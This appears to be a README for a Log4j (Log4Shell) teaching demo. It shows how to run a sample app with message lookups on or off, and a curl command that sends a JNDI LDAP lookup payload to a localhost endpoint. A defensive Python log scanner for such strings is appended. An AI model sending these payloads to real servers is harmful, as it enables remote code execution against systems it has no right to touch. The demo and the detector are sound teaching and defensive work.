log4j-vulnerability
Log4J Vulnerability demo & PPT
How to run the application
To run with the vulnerability mitigated (message lookups disabled; this flag exists from Log4j 2.10 and is a stop-gap, not a replacement for upgrading Log4j):
mvn spring-boot:run -Dspring-boot.run.jvmArguments="-Dlog4j2.formatMsgNoLookups=true"
To run with the vulnerability enabled (message lookups on):
mvn spring-boot:run -Dspring-boot.run.jvmArguments="-Dlog4j2.formatMsgNoLookups=false"
PPT
Normal invocation and logging:
curl http://localhost:8080/api/vulnerability?name=aman
Vulnerable invocation:
JNDI lookup string: ${jndi:ldap://127.0.0.1:3800}
URL-encoded form of the same string: %24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A3800%7D
Execute the curl below in a terminal or in Postman:
curl http://localhost:8080/api/vulnerability?name=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A3800%7D
When you execute this curl, the request parameter is logged, Log4j interprets the ${jndi:...} lookup in the message, and the application tries to reach the LDAP server and fetch whatever that query returns. That is the Log4j zero-day vulnerability.
In this example it throws a "connection refused" exception because there is no LDAP server listening at 127.0.0.1:3800. In a real attack the server would be reachable and under the attacker's control.
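As an added defender-side example that is not part of this demo repo, the following Python script scans access-log request lines for the lookup string this README sends, URL-decoding each line first so the encoded form above is caught; the log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the demo repo).
# Line 2 carries the URL-encoded JNDI lookup string shown in this README;
# line 3 contains "jndi" only as a plain word and must not be flagged.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Dec/2021:10:00:01 +0000] "GET /api/vulnerability?name=aman HTTP/1.1" 200 12
127.0.0.1 - - [10/Dec/2021:10:00:02 +0000] "GET /api/vulnerability?name=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A3800%7D HTTP/1.1" 500 0
127.0.0.1 - - [10/Dec/2021:10:00:03 +0000] "GET /api/vulnerability?name=jndi_user HTTP/1.1" 200 12
"""

# Log4j resolves the lookup prefix case-insensitively, so match "${jndi:" in any case.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def url_decode(text: str) -> str:
    """Percent-decode the line so an encoded "${jndi:" reads as the raw lookup."""
    return unquote(text)


def has_jndi_lookup(text: str) -> bool:
    """True if the (decoded) text contains a Log4j JNDI lookup string."""
    return JNDI_LOOKUP.search(url_decode(text)) is not None


def scan_log(log: str) -> list[int]:
    """Return the 1-based line numbers whose request contains a JNDI lookup string."""
    hits = []
    for number, line in enumerate(log.splitlines(), start=1):
        if has_jndi_lookup(line):
            hits.append(number)
    return hits


if __name__ == "__main__":
    for number in scan_log(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup string in request")
```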